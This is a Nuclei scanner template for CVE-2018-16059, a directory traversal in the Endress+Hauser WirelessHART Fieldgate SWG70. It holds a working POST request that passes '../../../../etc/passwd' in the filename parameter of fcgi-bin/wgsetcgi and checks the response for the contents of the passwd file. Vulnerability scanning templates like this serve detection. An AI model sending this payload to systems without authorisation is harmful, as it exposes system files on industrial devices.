my-nuclei-templates/CVE-2018-16059.yaml

36 lines
1.0 KiB
YAML
Executable File

id: CVE-2018-16059
info:
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
author: daffainfo
severity: medium
description: Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342
- https://www.exploit-db.com/exploits/45342/
- https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-16059
cwe-id: CWE-22
tags: cve,cve2018,iot,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200